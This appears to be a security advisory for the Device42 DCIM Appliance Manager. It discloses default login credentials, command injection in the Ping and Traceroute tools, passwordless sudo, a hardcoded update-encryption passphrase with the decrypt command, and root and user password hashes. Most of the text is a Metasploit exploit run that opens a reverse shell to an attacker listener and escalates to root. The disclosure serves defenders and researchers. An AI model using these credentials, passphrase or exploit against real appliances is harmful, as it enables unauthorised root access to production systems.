Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0 http://www.device42.com/download/ Device42 ships virtual appliances ready for production use as a trial (essentially dictated by the license provided). The Appliance Manager listens on HTTP (no SSL) on port 4242 with default credentials of d42admin:default. Within the Appliance Manager, the Ping and Traceroute utilities are susceptible to command injection via bash metacharacters. The user which the commands get executed under is the 'ubuntu' user, but this user has passwordless sudo ability, so it is essentially root access. Two exploits are provided that exploit these vulnerabilities using the default credentials. Updates from device42 are encrypted by default to prevent users from creating their own updates and uploading them, but the password for the encrypted zip file is 'pass:zofo8REgqM' so any user could create their own encrypted update using this passphrase. openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/update.zip -pass pass:zofo8REgqM Also, the root and ubuntu users have default passwords in the shadow file. Root ? $6$zhdissWh$2VrhU3tncXClbuUU3dJk2ieAKF3kTPpvcT9/VKw.Yw4rl1E2eYpAYAfZUgSZvYhqVQvUqLVRp8HOsoMueKgd10 Ubuntu ? $6$1eU5n9o7$w4.tmNriNT1Zb5HabWwlGmnmy8ij1fKbn0UGf9raHKdIaurYVD/ZU9C2s6DBueKhVbekZCozzAoHZH43.OwDi/ msf exploit(device42_tracert_exec) > show options Module options (exploit/linux/http/device42_tracert_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST 192.168.1.81 yes The target address RPORT 4242 yes The target port VHOST no HTTP server virtual host Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.31 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(device42_tracert_exec) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo YWFxSIuVtNUMShSi; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "YWFxSIuVtNUMShSi\r\n" [*] Matching... [*] B is input... [*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.81:39878) at 2014-11-22 17:36:59 -0600 sudo su id uid=0(root) gid=0(root) groups=0(root) exit id uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare) -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website